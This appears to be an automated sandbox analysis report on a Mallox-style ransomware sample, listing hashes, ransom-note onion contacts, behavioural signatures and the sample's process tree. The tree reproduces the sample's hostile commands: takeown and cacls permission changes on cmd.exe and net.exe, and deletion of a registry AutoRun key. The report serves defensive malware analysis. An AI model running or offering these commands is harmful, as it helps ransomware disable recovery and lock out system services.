Analysis
-
max time kernel
188s -
max time network
211s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
29-11-2022 18:19
Static task
static1
Behavioral task
behavioral1
Sample
a-Skjkmfvbkv.bin.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
a-Skjkmfvbkv.bin.exe
Resource
win10v2004-20221111-en
General
-
Target
a-Skjkmfvbkv.bin.exe
-
Size
12KB
-
MD5
8383ef681ba9f25dd7bf49c28cef559e
-
SHA1
12ddeb7c5e504dfbbf194842feb86662c170a8f1
-
SHA256
193d2c92560adcc08eaf3157673b1f835ae85c5c74679cac587e753f67b33dcf
-
SHA512
6ef606af88c235f21868f3e9d8ade4e3eb76308559f54ee2501b6302031bc635d68edd0a23de65a7e7590264827fdff1a4ac7e95d5327bc10fb4839397380af4
-
SSDEEP
384:pUR3OFfFLM89kDKyfjDWwYWxptYcFmVc03K:OOFhv9k28ttYcFmVc6K
Malware Config
Extracted
C:\FILE RECOVERY.txt
mallox.resurrection@onionmail.org
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 18 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exepid process 1552 takeown.exe 1688 takeown.exe 1856 takeown.exe 1932 takeown.exe 1748 takeown.exe 1992 takeown.exe 1572 takeown.exe 1920 takeown.exe 1272 takeown.exe 1944 takeown.exe 1932 takeown.exe 1304 takeown.exe 2024 takeown.exe 920 takeown.exe 560 takeown.exe 520 takeown.exe 1548 takeown.exe 1404 takeown.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
a-Skjkmfvbkv.bin.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run\Zitfq = "\"C:\\Users\\Admin\\AppData\\Roaming\\Egosmitqdu\\Zitfq.exe\"" a-Skjkmfvbkv.bin.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
a-Skjkmfvbkv.bin.exedescription ioc process File opened (read-only) \??\G: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\K: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\U: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\Y: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\F: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\H: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\N: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\O: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\T: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\Z: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\B: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\L: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\M: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\R: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\S: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\V: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\W: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\J: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\E: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\I: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\P: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\Q: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\X: a-Skjkmfvbkv.bin.exe File opened (read-only) \??\A: a-Skjkmfvbkv.bin.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 9 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
Processes:
a-Skjkmfvbkv.bin.exedescription pid process target process PID 576 set thread context of 1768 576 a-Skjkmfvbkv.bin.exe a-Skjkmfvbkv.bin.exe -
Drops file in Program Files directory 64 IoCs
Processes:
a-Skjkmfvbkv.bin.exedescription ioc process File created C:\Program Files\Java\jdk1.7.0_80\bin\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\DVD Maker\fr-FR\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\applet\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\DVD Maker\Shared\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\7-Zip\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\DVD Maker\de-DE\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\db\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\DVD Maker\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip a-Skjkmfvbkv.bin.exe File created C:\Program Files\DVD Maker\it-IT\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\DVD Maker\en-US\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\DVD Maker\es-ES\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\include\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\FILE RECOVERY.txt a-Skjkmfvbkv.bin.exe -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 568 sc.exe 1512 sc.exe 1628 sc.exe 1548 sc.exe 1612 sc.exe 1568 sc.exe 700 sc.exe 1796 sc.exe 1552 sc.exe 1288 sc.exe 296 sc.exe 636 sc.exe 1540 sc.exe 1204 sc.exe 1128 sc.exe 700 sc.exe 1836 sc.exe 1344 sc.exe 636 sc.exe 996 sc.exe 1952 sc.exe 1344 sc.exe 1088 sc.exe 1952 sc.exe 976 sc.exe 1628 sc.exe 692 sc.exe 320 sc.exe 268 sc.exe 1460 sc.exe 576 sc.exe 608 sc.exe 1980 sc.exe 2032 sc.exe 1188 sc.exe 1536 sc.exe 2032 sc.exe 1924 sc.exe 1404 sc.exe 640 sc.exe 576 sc.exe 1188 sc.exe 1088 sc.exe 700 sc.exe 1576 sc.exe 608 sc.exe 1924 sc.exe 1816 sc.exe 588 sc.exe 580 sc.exe 920 sc.exe 1628 sc.exe 564 sc.exe 580 sc.exe 960 sc.exe 1116 sc.exe 1536 sc.exe 920 sc.exe 560 sc.exe 608 sc.exe 692 sc.exe 1492 sc.exe 1560 sc.exe 1932 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1200 vssadmin.exe -
Kills process with taskkill 26 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 872 taskkill.exe 1796 taskkill.exe 636 taskkill.exe 872 taskkill.exe 1796 taskkill.exe 1540 taskkill.exe 640 taskkill.exe 1568 taskkill.exe 1572 taskkill.exe 520 taskkill.exe 1792 taskkill.exe 636 taskkill.exe 1512 taskkill.exe 1540 taskkill.exe 1512 taskkill.exe 1408 taskkill.exe 636 taskkill.exe 2036 taskkill.exe 1532 taskkill.exe 2040 taskkill.exe 636 taskkill.exe 1628 taskkill.exe 1572 taskkill.exe 2040 taskkill.exe 976 taskkill.exe 1272 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exea-Skjkmfvbkv.bin.exepid process 320 powershell.exe 1768 a-Skjkmfvbkv.bin.exe -
Suspicious use of AdjustPrivilegeToken 41 IoCs
Processes:
powershell.exea-Skjkmfvbkv.bin.exetakeown.exea-Skjkmfvbkv.bin.exevssvc.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 320 powershell.exe Token: SeDebugPrivilege 576 a-Skjkmfvbkv.bin.exe Token: SeTakeOwnershipPrivilege 1992 takeown.exe Token: SeTakeOwnershipPrivilege 1768 a-Skjkmfvbkv.bin.exe Token: SeDebugPrivilege 1768 a-Skjkmfvbkv.bin.exe Token: SeBackupPrivilege 952 vssvc.exe Token: SeRestorePrivilege 952 vssvc.exe Token: SeAuditPrivilege 952 vssvc.exe Token: SeTakeOwnershipPrivilege 1404 takeown.exe Token: SeTakeOwnershipPrivilege 1552 takeown.exe Token: SeTakeOwnershipPrivilege 2024 takeown.exe Token: SeTakeOwnershipPrivilege 920 takeown.exe Token: SeTakeOwnershipPrivilege 1688 takeown.exe Token: SeTakeOwnershipPrivilege 1572 takeown.exe Token: SeTakeOwnershipPrivilege 1548 takeown.exe Token: SeDebugPrivilege 1792 taskkill.exe Token: SeDebugPrivilege 1572 taskkill.exe Token: SeDebugPrivilege 636 taskkill.exe Token: SeDebugPrivilege 1512 taskkill.exe Token: SeDebugPrivilege 872 taskkill.exe Token: SeDebugPrivilege 1796 taskkill.exe Token: SeDebugPrivilege 2040 taskkill.exe Token: SeDebugPrivilege 1540 taskkill.exe Token: SeDebugPrivilege 1532 taskkill.exe Token: SeDebugPrivilege 636 taskkill.exe Token: SeDebugPrivilege 1512 taskkill.exe Token: SeDebugPrivilege 872 taskkill.exe Token: SeDebugPrivilege 1796 taskkill.exe Token: SeDebugPrivilege 2040 taskkill.exe Token: SeDebugPrivilege 1540 taskkill.exe Token: SeDebugPrivilege 1408 taskkill.exe Token: SeDebugPrivilege 636 taskkill.exe Token: SeDebugPrivilege 976 taskkill.exe Token: SeDebugPrivilege 640 taskkill.exe Token: SeDebugPrivilege 1568 taskkill.exe Token: SeDebugPrivilege 1572 taskkill.exe Token: SeDebugPrivilege 1628 taskkill.exe Token: SeDebugPrivilege 1272 taskkill.exe Token: SeDebugPrivilege 520 taskkill.exe Token: SeDebugPrivilege 636 taskkill.exe Token: SeDebugPrivilege 2036 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a-Skjkmfvbkv.bin.execmd.exedescription pid process target process PID 576 wrote to memory of 320 576 a-Skjkmfvbkv.bin.exe powershell.exe PID 576 wrote to memory of 320 576 a-Skjkmfvbkv.bin.exe powershell.exe PID 576 wrote to memory of 320 576 a-Skjkmfvbkv.bin.exe powershell.exe PID 576 wrote to memory of 320 576 a-Skjkmfvbkv.bin.exe powershell.exe PID 576 wrote to memory of 1080 576 a-Skjkmfvbkv.bin.exe cmd.exe PID 576 wrote to memory of 1080 576 a-Skjkmfvbkv.bin.exe cmd.exe PID 576 wrote to memory of 1080 576 a-Skjkmfvbkv.bin.exe cmd.exe PID 576 wrote to memory of 1080 576 a-Skjkmfvbkv.bin.exe cmd.exe PID 1080 wrote to memory of 1568 1080 cmd.exe reg.exe PID 1080 wrote to memory of 1568 1080 cmd.exe reg.exe PID 1080 wrote to memory of 1568 1080 cmd.exe reg.exe PID 1080 wrote to memory of 1568 1080 cmd.exe reg.exe PID 1080 wrote to memory of 1992 1080 cmd.exe takeown.exe PID 1080 wrote to memory of 1992 1080 cmd.exe takeown.exe PID 1080 wrote to memory of 1992 1080 cmd.exe takeown.exe PID 1080 wrote to memory of 1992 1080 cmd.exe takeown.exe PID 1080 wrote to memory of 1164 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 1164 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 1164 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 1164 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 844 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 844 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 844 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 844 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 1124 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 1124 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 1124 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 1124 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 1924 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 1924 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 1924 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 1924 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 852 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 852 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 852 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 852 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 2012 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 2012 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 2012 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 2012 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 932 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 932 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 932 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 932 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 1616 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 1616 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 1616 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 1616 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 1016 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 1016 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 1016 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 1016 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 1980 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 1980 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 1980 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 1980 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 1632 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 1632 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 1632 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 1632 1080 cmd.exe cmd.exe PID 1080 wrote to memory of 1636 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 1636 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 1636 1080 cmd.exe cacls.exe PID 1080 wrote to memory of 1636 1080 cmd.exe cacls.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
a-Skjkmfvbkv.bin.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" a-Skjkmfvbkv.bin.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a-Skjkmfvbkv.bin.exe"C:\Users\Admin\AppData\Local\Temp\a-Skjkmfvbkv.bin.exe"1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-Date2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Ksifbwxmmfbgnkill$-arab.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\cmd.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g system:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\cmd.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g system:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\net.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
